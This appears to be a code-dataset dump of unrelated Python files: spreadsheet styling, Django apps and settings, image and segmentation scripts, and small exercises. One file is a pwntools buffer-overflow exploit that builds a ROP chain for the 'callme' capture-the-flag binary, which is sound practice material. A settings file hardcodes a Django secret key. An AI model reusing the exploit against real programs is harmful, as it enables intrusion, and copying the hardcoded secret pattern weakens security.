+{"seq_id":"642479696","text":"# coding:utf-8\nfrom openpyxl.styles import PatternFill, Style, Color, Border, Side, Font, Alignment, Protection, colors as op_colors\nimport re\n\nclass Styler(object):\n \"\"\"\n Creates openpyxl Style to be applied\n \"\"\"\n def __init__(self, bg_color='white', bold=False, font_size=12, font_color='black', number_format='General',\n protection=False, underline=None):\n self.bold = bold\n self.font_size = font_size\n self.font_color = font_color\n self.number_format = number_format\n self.protection = protection\n self.underline = underline\n\n if bg_color.startswith('#'):\n bg_color = bg_color[1:]\n if self.is_string_is_hex_color_code(hex_string=bg_color):\n self.bg_color = bg_color\n else:\n self.bg_color = colors.get(bg_color, colors.white)\n\n if font_color.startswith('#'):\n font_color = font_color[1:]\n if self.is_string_is_hex_color_code(hex_string=font_color):\n self.font_color = font_color\n else:\n self.font_color = colors.get(self.font_color, colors.black)\n\n def create_style(self):\n side = Side(border_style='thin', color=colors.black)\n border = Border(left=side, right=side, top=side, bottom=side)\n return Style(font=Font(name=\"Arial\", size=self.font_size, color=Color(self.font_color),\n bold=self.bold, underline=self.underline),\n fill=PatternFill(patternType='solid', fgColor=self.bg_color),\n alignment=Alignment(horizontal='center', vertical='center', wrap_text=True, shrink_to_fit=True, indent=0),\n border=border,\n number_format=self.number_format,\n protection=Protection(locked=self.protection))\n\n def is_string_is_hex_color_code(self, hex_string):\n if re.search(r'[a-fA-F0-9]{6}$', hex_string):\n return True\n else:\n return False\n\n\ndef not_supported(*args, **kwargs):\n raise NotImplementedError('ImmutableDict is immutable')\n\n\nclass ImmutableDict(dict):\n __delitem__ = not_supported\n __setitem__ = not_supported\n __setattr__ = not_supported\n update = not_supported\n clear = not_supported\n pop = not_supported\n popitem = not_supported\n\n def __getattr__(self, item):\n return self[item]\n\nnumber_formats = ImmutableDict(general='General', date='DD/MM/YY', percent='0.0%', time_24_hours='HH:MM',\n time_12_hours='h:MM AM/PM', date_time='DD/MM/YY HH:MM',\n thousands_comma_sep='#,##0')\n\ncolors = ImmutableDict(white='FFFFFF', blue=op_colors.BLUE, yellow=op_colors.YELLOW, green=op_colors.GREEN,\n black=op_colors.BLACK, red=op_colors.RED, purple='800080', grey='D3D3D3',)\n","sub_path":"StyleFrame/styler.py","file_name":"styler.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"57926158","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\n\nclass User(AbstractUser):\n friends = models.ManyToManyField(\"User\", blank=True)\n image = models.ImageField(upload_to='profile_images')\n dark_mode = models.BooleanField(default=True)\n def __str__(self):\n return self.username\n\n# Create your models here.\nclass Friend_Request(models.Model):\n from_user = models.ForeignKey(\n User, related_name='from_user', on_delete=models.CASCADE\n )\n to_user = models.ForeignKey(\n User, related_name='to_user', on_delete=models.CASCADE\n )\n\n","sub_path":"pitch_proto/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"344791957","text":"import tornado.web\nimport tornado.ioloop\nimport tornado.httpserver\n\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.write(\"Hellow, world\")\n\n\ndef make_app():\n return tornado.web.Application([\n (r\"/\", MainHandler)\n ])\n\n\nif __name__ == '__main__':\n app = make_app()\n # app.listen(8888)\n server = tornado.httpserver.HTTPServer(app)\n server.bind(8888)\n server.start(0)\n tornado.ioloop.IOLoop.current().start()\n","sub_path":"python/demo/tornado_demo/tornado_demo.py","file_name":"tornado_demo.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"389479813","text":"import numpy as np\nimport matplotlib.image as img\nimport matplotlib.pyplot as plt\nimport imageio\nimport time as t\n\ns = t.time()\n#Enter sample percentage\nsample_rate = 0.25 #5% sampling if '0.05'\n\n#Enter image adress\nXorig = img.imread('elephants.jpg')\n\nX = Xorig\nny,nx,nz = X.shape\nprint(\"Shape of Image: \",X.shape)\n# Randomly selecting samples\nk = round(nx * ny * sample_rate) # 50% sample\nri = np.random.choice(nx * ny, k, replace=False) # random sample of indices\nprint(\"Number of samples: \",k)\nb = X.T.flat[ri]\nXm = np.zeros(X.shape)\nfor i in range(nz):\n Xm[:,:,i].T.flat[ri] = X[:,:,i].T.flat[ri]\nX1 = np.zeros(X.shape)\nfor i in range(nz):\n X1[:,:,i].T.flat[ri] = X[:,:,i].T.flat[ri]\n\ncondi = True\ncount = 1\nwhile condi:\n X2=np.zeros((ny+2,nx+2,nz))\n for i in range(nz):\n X2[:,:,i] = np.pad(X1[:,:,i], [(1, 1), (1, 1)], mode='constant')\n X3 = X1\n zero_num = (X1 == 0).astype(int)\n if 0 < np.sum(zero_num):\n print('Iteration number: ', count)\n count += 1\n for channel in range(nz):\n for i in range(len(X2[:,0,channel])-2):\n for j in range(len(X2[0,:,channel])-2):\n r = i+1\n c = j+1\n if (X2[r,c,channel] == 0):\n mean = 0\n k = 0\n if (X2[r-1,c-1,channel] != 0):\n mean += X2[r-1,c-1,channel]\n k += 1\n if (X2[r-1,c,channel] != 0):\n mean += X2[r-1,c,channel]\n k += 1\n if (X2[r-1,c+1,channel] != 0):\n mean += X2[r-1,c+1,channel]\n k += 1\n if (X2[r,c-1,channel] != 0):\n mean += X2[r,c-1,channel]\n k += 1\n if (X2[r,c+1,channel] != 0):\n mean += X2[r,c+1,channel]\n k += 1\n if (X2[r+1,c-1,channel] != 0):\n mean += X2[r+1,c-1,channel]\n k += 1\n if (X2[r+1,c,channel] != 0):\n mean += X2[r+1,c,channel]\n k += 1\n if (X2[r+1,c+1,channel] != 0):\n mean += X2[r+1,c+1,channel]\n k += 1\n if (k != 0):\n mean = mean / k\n X1[i,j,channel] = mean\n else:\n condi=False\n\nExecution_time = int(np.round(t.time()-s))\nprint('Execution time: {} sec'.format(Execution_time))\n\nXm[Xm == 0] = 255\nfig, axs = plt.subplots(1, 3,figsize=(15,10))\naxs[0].imshow(X)\n#for jpg file type\naxs[1].imshow((Xm).astype(np.uint8))\naxs[2].imshow((X1).astype(np.uint8))\n#for png type file\n#axs[1].imshow((Xm))\n#axs[2].imshow((X1))\naxs[0].set_title('Orignal')\naxs[1].set_title('{}% sampled.jpg'.format(sample_rate*100))\naxs[2].set_title('Output')\n\nimageio.imwrite('input_image.jpg', X)\nimageio.imwrite('{}%_input.jpg'.format(sample_rate*100), Xm)\nimageio.imwrite('Output.jpg', X1)","sub_path":"source-code/Image_Reconstruction.py","file_name":"Image_Reconstruction.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"460280934","text":"ogrenciler={}\nfor i in range(1,6):\n print(\"\")\n print(\"Öğrenci\",i,\"Bilgileri\")\n print(\"---------------------\")\n adsoyad = str(input(\"Öğrencinin Adı Soyadı: \"))\n asinav = int(input(\"Öğrencinin Ara Sınavı: \"))\n pnotu = int(input(\"Öğrencinin Proje Notu: \"))\n fnotu = int(input(\"Öğrencinin Final Notu: \"))\n gnotu = (asinav * (0.3)) + (pnotu * (0.3)) + (fnotu * (0.4))\n ogrenciler[i] = {\"Ad Soyad\": adsoyad, \"Ara Sınav\": str(asinav),\"Proje Notu\":str(pnotu),\"Final Notu\":str(fnotu),\"Geçme Notu\":str(gnotu)}\nsirali_ogrenciler = sorted(ogrenciler.items(), key=lambda x: float(x[1][\"Geçme Notu\"]),reverse=True)\nprint(sirali_ogrenciler)\n","sub_path":"Homeworks/HW3.py","file_name":"HW3.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"592510105","text":"import json\nimport pygal.maps.world as pmw\nfrom pygal.style import RotateStyle\nfrom country_codes import get_country_code\n\n# Load the data into a list.\nfilename = 'population_data.json'\n\n# Build a dictionary of population data {\"country code\": population}\ncc_pops = {}\n\nwith open(filename) as f:\n pop_data = json.load(f)\n\n # Print the 2010 population for each country.\n for pop_dict in pop_data:\n if pop_dict['Year'] == '2010':\n country_name = pop_dict['Country Name']\n print(country_name)\n population = int(float(pop_dict['Value']))\n country_code = get_country_code(country_name)\n if country_code:\n cc_pops[country_code] = population\n\ncc_pops1, cc_pops2, cc_pops3 = {}, {}, {}\nfor cc, pop in cc_pops.items():\n if pop < 10000000:\n cc_pops1[cc] = pop\n elif pop < 1000000000:\n cc_pops2[cc] = pop\n else:\n cc_pops3[cc] = pop\n\nwm_style = RotateStyle('#336699')\nwm = pmw.World(style = wm_style)\nwm.title = \"World Populations in 2010\"\nwm.add(\"0-10M\", cc_pops1)\nwm.add(\"10M-1B\", cc_pops2)\nwm.add(\">1B\", cc_pops3)\nwm.render_to_file(\"2010_populations.svg\")","sub_path":"data_visualization/world_population.py","file_name":"world_population.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"434011359","text":"from pwn import *\n\n# use the following command to have the binary listen on localhost:1234\n# socat TCP4-LISTEN:1234,reuseaddr,fork EXEC:./callme\n\ncontext.clear(arch=\"amd64\") # set architecture to amd64, it's needed to generate the ropchain\nLOCATION = \"./callme\" # position of the binary \nbinary = ELF(LOCATION) # create object with data from the binary\nrop = ROP(LOCATION) # create object to help building ropchain\nr = remote(\"localhost\", 1234) # establish connection with the binary\n\ndef overflow(): # function used to find return address offset\n log.info(\"Finding RIP offset...\") \n proc = process(LOCATION, timeout=2) # start local process \n proc.sendline(cyclic(1024, n=8)) # send cyclic pattern \n proc.recvall() # receive data from process\n core = Core(\"core\") # create object from data of the core dump\n offset = cyclic_find(core.pc, n=8) # calculate offset from cyclic pattern\n log.success(\"EIP at offset {0}\".format(offset))\n return 'A' * offset # return as much A's as needed\n\ndef makeRop(): # function used to generate ropchain\n rop.callme_one(1,2,3) # chain call to callme_one with the needed arguments \n rop.callme_two(1,2,3) # as above\n rop.callme_three(1,2,3) # as above\n return str(rop) # return ropchain\n\ndef exploit():\n exp = \"\" # create exploit string\n exp += padding # add A's to overflow until the return address\n exp += makeRop() # overwrite return address with ropchain beginning\n r.recvuntil('>') # receive data from the remote process until the prompt\n r.sendline(exp) # send exploit\n log.success(\"Flag:\" + r.recvall()) # profit\n\npadding = overflow()\nexploit() # start everything\n","sub_path":"callme/64bit/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"648863009","text":"import numpy as np\n\ndropout_rate = 0.2\nexample_output = np.array([0.27, -1.03, 0.67, 0.99, 0.05,\n -0.37, -2.01, 1.13, -0.07, 0.73])\nprint(f'sum initial {sum(example_output)}')\n\nsums = []\nfor i in range(10000):\n\n example_output2 = example_output * \\\n np.random.binomial(1, 1-dropout_rate, example_output.shape) / \\\n (1-dropout_rate)\n sums.append(sum(example_output2))\n\nprint(f'mean sum: {np.mean(sums)}')","sub_path":"ch15_3.py","file_name":"ch15_3.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"433332598","text":"################################################################################\n#\n# LOCAL SETTINGS, MAKE YOUR CHANGES HERE!\n# \n# These settings over-ride those in settings.py\n# This is where you should make all your changes.\n#\n# If you do not have a local_settings.py, copy or rename\n# local_settings.py.template to local_settings.py and follow the instructions.\n#\n# If you would like to change a setting that is not in local_settings.py, copy\n# it from the settings.py file and make ALL changes here, in local_settings.py\n#\n################################################################################\n\n\n# Path to the GeoLite City(required) and Geo Organization(optional) databases\n# from MaxMind. GeoLite City is free for most uses. See license on site.\n# Latest version of GeoLite City can be downloaded from\n# http://dev.maxmind.com/geoip/legacy/geolite\nGEOLITECITY_ABSOLUTE_PATH = \"/export/fedorthurman1/Projects/usage/GeoIP/GeoLiteCity.dat\"\nGEOORGANIZATION_ABSOLUTE_PATH = \"/export/fedorthurman1/Projects/usage/GeoIP/GeoOrganization.dat\"\n\n# use DEBUG = False in production!\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n #('example', 'example@example.com'),\n)\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',# Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': '/export/fedorthurman1/Projects/usage/usage.db', # Or path to database file if using sqlite3.\n 'USER': '', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n}\n\n# Make this unique, and don't share it with anybody.\n# The default one is 62 characters long and looks something like this:\n# SECRET_KEY = '7u&*d3di%e*7fuu$^-eeteu(mk_e+usb3$g7jv9a%&!&#eyt#-'\n#\n# You can generate a new one on the command line like so:\n# python -c 'import random; print \"\".join([random.choice(\"abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)\") for i in range(62)])'\nSECRET_KEY = '7u&*d3di%e*7fuu$^-eeteu(mk_e+usb3$g7jv9a%&!&#eyt#-'\n\n# A list of strings representing the host/domain names that this Django site can serve.\n# This is a security measure to prevent an attacker from poisoning caches and password\n# reset emails with links to malicious hosts by submitting requests with a fake HTTP Host\n# header, which is possible even under many seemingly-safe webserver configurations.\nALLOWED_HOSTS = ['uvcdat.llnl.gov', '127.0.0.1', 'localhost']\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# In a Windows environment this must be set to your system time zone.\nTIME_ZONE = 'America/Los_Angeles'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/media/\"\nMEDIA_ROOT = '/var/www/emily.llnl.gov/usage/media/'\n\n# URL that handles the media served from MEDIA_ROOT. 
Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = 'http://localhost:8080/media/'\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# To deploy, run `python manage.py collectstatic`\n#\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = '/var/www/emily.llnl.gov/usage/static/'\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = 'http://127.0.0.1/static/'\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n },\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'console':{\n 'level': 'ERROR',\n 'class': 'logging.StreamHandler',\n 'filters': ['require_debug_false'],\n 'formatter': 'verbose'\n },\n 'file':{\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': 'debug.log',\n },\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins', 'console'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n","sub_path":"usage/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"427965752","text":"from django.conf.urls import url\nfrom django.contrib.auth import views as auth_views\nfrom . import views\n\napp_name = 'accounts'\n\nurlpatterns = [\n url(r'^login/', auth_views.LoginView.as_view(template_name=\"accounts/login.html\"), name='login'),\n url(r'^logout/', auth_views.LogoutView.as_view(), name='logout'),\n url(r'^signup/', views.SignUpView.as_view(), name='signup'),\n url(r'^profile/$', views.profileinfoview, name='user_profile'),\n url(r'^profile_edit/$', views.editprofileview, name='edit_profile'),\n url(r'^add_friend/(?P\\d+)/', views.add_friend_view, name='add_friend'),\n url(r'^my_friends/$', views.get_friends_list, name='my_friends'),\n]\n","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"610455476","text":"'''\r\nCreated on Mar 14, 2017\r\n\r\n@author: kautilya.save\r\n'''\r\nimport cx_Oracle\r\ncon = cx_Oracle.Connection('t753423/t753423@10.123.79.57/georli02')\r\ncur = cx_Oracle.Cursor(con)\r\ncur.execute(\"SELECT * FROM Computer\")\r\nlist1 = []\r\n# for v in list1 :\r\n# print(v)\r\nfor row in cur:\r\n list1.append(row)\r\n print(row)\r\n \r\nprint(list1)\r\nprint(cur.rowcount)\r\ncur.close()\r\n# con.commit()\r\ncon.close()","sub_path":"python/PF/DBMSCon/Connection/wherequery.py","file_name":"wherequery.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"489190685","text":"import numpy as np\nimport matplotlib as mpl\nmpl.use('agg')\nmpl.rcParams['axes.grid'] = False\nmpl.rcParams['figure.figsize'] = (12, 12)\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport tensorflow as tf\nfrom tensorflow.python.keras import models\nimport time\nfrom unet import unet, bce_dice_loss, dice_loss, dice_coeff\nfrom data import prepare_train_val, prepare_test\nfrom tensorflow.python.keras import backend as K\nimport rgb_lab_formulation as Conv_img\nimport utils\nimport gc\nimport os\n# Train your model\n\n# cspace = \"RGB\" or \"HSV\" or \"HSV-RGB\" or \"LAB\"\ndef callback_def(epochs, cspace, type_train='', it=0, lr=0.001, batch_size=8):\n if(not os.path.exists('models/' + type_train + '/' + cspace + '/')):\n os.makedirs('models/' + type_train + '/' + cspace + '/')\n save_model_path = 'models/' + type_train + '/' + cspace + '/weights' + str(epochs) + '_' + str(it) + '_' + str(lr) + '_' + str(batch_size) + '.hdf5'\n save_log_path = 'models/' + type_train + '/' + cspace + '/log' + str(epochs) + '_' + str(it) + '_' + str(lr) + '_' + str(batch_size) + '_' + str(int(time.time()))\n cp = [tf.keras.callbacks.ModelCheckpoint(\n filepath=save_model_path,\n monitor='val_dice_loss',\n save_best_only=True,\n verbose=1),\n tf.keras.callbacks.TensorBoard(\n log_dir=save_log_path\n )]\n return cp, save_model_path\n\n# cspace = \"RGB\" or \"HSV\" or \"HSV-RGB\" or \"LAB\"\ndef train_history(epochs, cspace, history, type_train='', it=0):\n dice = history.history['dice_loss']\n val_dice = history.history['val_dice_loss']\n\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n\n epochs_range = range(epochs)\n\n fig = plt.figure(figsize=(16, 8))\n plt.subplot(1, 2, 1)\n plt.plot(epochs_range, dice, label='Training Dice Loss')\n plt.plot(epochs_range, val_dice, label='Validation Dice Loss')\n plt.legend(loc='upper right')\n plt.title('Training and Validation Dice Loss')\n\n plt.subplot(1, 2, 2)\n plt.plot(epochs_range, loss, label='Training Loss')\n plt.plot(epochs_range, val_loss, label='Validation Loss')\n plt.legend(loc='upper right')\n plt.title('Training and Validation Loss')\n\n fig.savefig('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/loss.png', bbox_inches='tight')\n\n# x_in and y_in are numpy arrays\ndef fjaccard(x_in, y_in):\n x = x_in.flatten()\n y = y_in.flatten()\n return np.sum(np.logical_and(x, y).astype(float)) / np.sum(\n np.logical_or(x, y).astype(float))\n\ndef evaluate_test(model, test_ds, num_test_examples, cspace, epochs, save_model_path=None, type_train='',write_images=True, it=0):\n if (save_model_path != None):\n model = models.load_model(\n save_model_path,\n custom_objects={\n 'bce_dice_loss': bce_dice_loss,\n 'dice_loss': dice_loss\n })\n # Let's visualize some of the outputs\n mjccard = 0\n score = 0\n v_jaccard = np.zeros(num_test_examples)\n v_sensitivity = np.zeros(num_test_examples)\n v_specificity = np.zeros(num_test_examples)\n v_accuracy = np.zeros(num_test_examples)\n v_dice = np.zeros(num_test_examples)\n\n crf_jaccard = np.zeros(num_test_examples)\n crf_sensitivity = np.zeros(num_test_examples)\n crf_specificity = np.zeros(num_test_examples)\n crf_accuracy = np.zeros(num_test_examples)\n crf_dice = np.zeros(num_test_examples)\n\n data_aug_iter = test_ds.make_one_shot_iterator()\n next_element = data_aug_iter.get_next()\n if(not os.path.exists('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/predict/')):\n 
os.makedirs('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/predict/')\n for j in range(num_test_examples):\n # Running next element in our graph will produce a batch of images\n batch_of_imgs, label = tf.keras.backend.get_session().run(next_element)\n img = batch_of_imgs[0]\n\n predicted_label = model.predict(batch_of_imgs)[0]\n mpimg.imsave('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/predict/' + str(j) + '.png', predicted_label[:,:,0])\n mask_pred = (predicted_label[:, :, 0] > 0.55).astype(int)\n label = label.astype(int)\n\n v_jaccard[j] = fjaccard(label[0, :, :, 0], mask_pred)\n v_sensitivity[j] = utils.sensitivity(label[0,:,:,0], mask_pred)\n v_specificity[j] = utils.specificity(label[0,:,:,0], mask_pred)\n v_accuracy[j] = utils.accuracy(label[0,:,:,0], mask_pred)\n v_dice[j] = utils.dice_coeff(label[0,:,:,0], mask_pred)\n score += v_jaccard[j] if v_jaccard[j] >= 0.65 else 0\n print(score)\n mjccard += v_jaccard[j]\n\n img_rgb = img[:, :, :3]\n\n if(cspace == 'HSV'):\n img_rgb = tf.keras.backend.get_session().run(tf.image.hsv_to_rgb(img_rgb))\n elif(cspace == 'LAB'):\n img_rgb = tf.keras.backend.get_session().run(Conv_img.lab_to_rgb(img_rgb))\n\n crf_mask = utils.dense_crf(np.array(img_rgb*255).astype(np.uint8), np.array(predicted_label[:, :, 0]).astype(np.float32))\n\n crf_jaccard[j] = fjaccard(label[0, :, :, 0], crf_mask)\n crf_sensitivity[j] = utils.sensitivity(label[0,:,:,0], crf_mask)\n crf_specificity[j] = utils.specificity(label[0,:,:,0], crf_mask)\n crf_accuracy[j] = utils.accuracy(label[0,:,:,0], crf_mask)\n crf_dice[j] = utils.dice_coeff(label[0,:,:,0], crf_mask)\n\n if(write_images):\n fig = plt.figure(figsize=(25, 25))\n\n plt.subplot(1, 4, 1)\n plt.imshow(img[:, :, :3])\n plt.title(\"Input image\")\n \n plt.subplot(1, 4, 2)\n plt.imshow(label[0, :, :, 0])\n plt.title(\"Actual Mask\")\n \n plt.subplot(1, 4, 3)\n plt.imshow(predicted_label[:, :, 0] > 0.55)\n plt.title(\"Predicted Mask\\n\" +\n \"Jaccard = \" + str(v_jaccard[j]) +\n '\\nSensitivity = ' + str(v_sensitivity[j]) +\n '\\nSpecificity = ' + str(v_specificity[j]) +\n '\\nAccuracy = ' + str(v_accuracy[j]) +\n '\\nDice = ' + str(v_dice[j]))\n \n plt.subplot(1, 4, 4)\n plt.imshow(crf_mask)\n plt.title(\"CRF Mask\\n\" +\n \"Jaccard = \" + str(crf_jaccard[j]) +\n '\\nSensitivity = ' + str(crf_sensitivity[j]) +\n '\\nSpecificity = ' + str(crf_specificity[j]) +\n '\\nAccuracy = ' + str(crf_accuracy[j]) +\n '\\nDice = ' + str(crf_dice[j]))\n \n fig.savefig(\n 'pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/' + str(j) + '.png',\n bbox_inches='tight')\n plt.close(fig)\n mpimg.imsave('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/predict/' + str(j) + '.png', predicted_label[:,:,0])\n plt.close()\n\n mjccard /= num_test_examples\n score /= num_test_examples\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/jaccard', v_jaccard)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/sensitivity', v_sensitivity)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/specificity', v_specificity)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/accuracy', v_accuracy)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/dice', v_dice)\n with open('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + 
'/score','w') as f:\n f.write('Score = ' + str(score) +\n '\\nSensitivity = ' + str(np.mean(v_sensitivity)) +\n '\\nSpecificity = ' + str(np.mean(v_specificity)) +\n '\\nAccuracy = ' + str(np.mean(v_accuracy)) +\n '\\nDice = ' + str(np.mean(v_dice)) +\n '\\nJaccars = ' + str(np.mean(v_jaccard)))\n\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/crf_jaccard', crf_jaccard)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/crf_sensitivity', crf_sensitivity)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/crf_crf_specificity', crf_specificity)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/crf_accuracy', crf_accuracy)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/crf_dice', crf_dice)\n with open('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/crf_score','w') as f:\n f.write('Sensitivity = ' + str(np.mean(crf_sensitivity)) +\n '\\nSpecificity = ' + str(np.mean(crf_specificity)) +\n '\\nAccuracy = ' + str(np.mean(crf_accuracy)) +\n '\\nDice = ' + str(np.mean(crf_dice)) +\n '\\nJaccars = ' + str(np.mean(crf_jaccard)))\n\n print('Jccard = ' + str(mjccard))\n print('Score = ' + str(score))\n return mjccard, score\n\nif __name__ == '__main__':\n epochs = 80\n #cspacev = [\"RGB\",\"HSV\",\"LAB\",\"RGB-HSV\",\"RGB-HSV-L\",\"RGB-HSV-LAB\",\"RGB-SV-LAB\"]\n #img_shapev = [3,3,3,6, 7, 9, 8]\n cspacev = [\"RGB\"]\n img_shapev = [3]\n img_shape = (256, 256, 3)\n type_train = 'fine_tune'\n batch_size = 8\n lr = 0.00001\n i = 0\n for cspace, img_dim in zip(cspacev, img_shapev):\n inic = 0\n fim = 10\n for it in [0,3,4,5,6,7]:\n with tf.Graph().as_default():\n with tf.Session().as_default():\n # Adjust image shape\n imagelst = list(img_shape)\n imagelst[2] = img_dim\n img_shape = tuple(imagelst)\n \n print(\"Loading dataset...\\n\")\n \n if(type_train == \"direct_transfer\"):\n dataset = 'ISIC_TEST'\n else:\n dataset = 'PAD'\n train_ds, val_ds, num_train_examples, num_val_examples = prepare_train_val(\n dataset=dataset,\n cspace=cspace,\n img_shape=img_shape,\n batch_size=batch_size)\n pad_test_ds, pad_num_test_examples = prepare_test(\n dataset='PAD',\n cspace=cspace,\n img_shape=img_shape)\n \n print(\"Done. 
Iteration = \" + str(it) + \"\\n\")\n # Load Model\n i = i + 1\n if(type_train == \"fine_tune\" or type_train == 'ISIC/fine_tune'):\n model = models.load_model(\n 'models/' + 'direct_transfer' + '/' + cspace + '/weights' + str(epochs) + '_' + str(it) + '_' + '0.0001' + '_' + str(batch_size) + '.hdf5',\n custom_objects={\n 'bce_dice_loss': bce_dice_loss,\n 'dice_loss': dice_loss\n })\n else:\n model = unet(img_shape, lr=lr)\n start_time = time.time()\n cp, save_model_path = callback_def(\n epochs, cspace,\n type_train=type_train, it=it, lr=lr, batch_size=batch_size)\n \n \n # Train Model\n history = model.fit(\n train_ds,\n steps_per_epoch=int(np.ceil(num_train_examples / float(batch_size))),\n epochs=epochs,\n validation_data=val_ds,\n validation_steps=int(np.ceil(num_val_examples / float(batch_size))),\n callbacks=cp)\n \n # Save Results\n if(not os.path.exists('pos_results/' + type_train + '/' + cspace + '/' + str(epochs) + '/' + str(it))):\n os.makedirs('pos_results/' + type_train + '/' + cspace + '/' + str(epochs) + '/' + str(it))\n with open('pos_results/' + type_train + '/' + cspace + '/' + str(epochs) + '/' + str(it) + '/time','w') as f:\n f.write(str(time.time() - start_time))\n train_history(\n epochs,\n cspace,\n history,\n type_train= type_train + '/',\n it=it)\n \n # Test Model\n evaluate_test(\n model,\n pad_test_ds,\n pad_num_test_examples,\n cspace,\n epochs,\n type_train= type_train + '/',\n write_images=False,\n it=it,\n save_model_path='models/' + type_train + '/' + cspace + '/weights' + str(epochs) + '_' + str(it) + '_' + str(lr) + '_' + str(batch_size) + '.hdf5',)\n # evaluate_test(model, isictest_test_ds, isictest_num_test_examples, cspace, epochs,\n # save_model_path='models/' + cspace + '/weights' + str(epochs) + '.hdf5',\n # ISIC='/ISICTEST')\n # evaluate_test(model, isic_test_ds, isic_num_test_examples, cspace, epochs,\n # save_model_path='models/' + cspace + '/weights' + str(epochs) + '.hdf5',\n # ISIC='/ISIC')\n K.clear_session()\n del model, pad_test_ds\n # del model, train_ds, val_ds,pad_test_ds\n 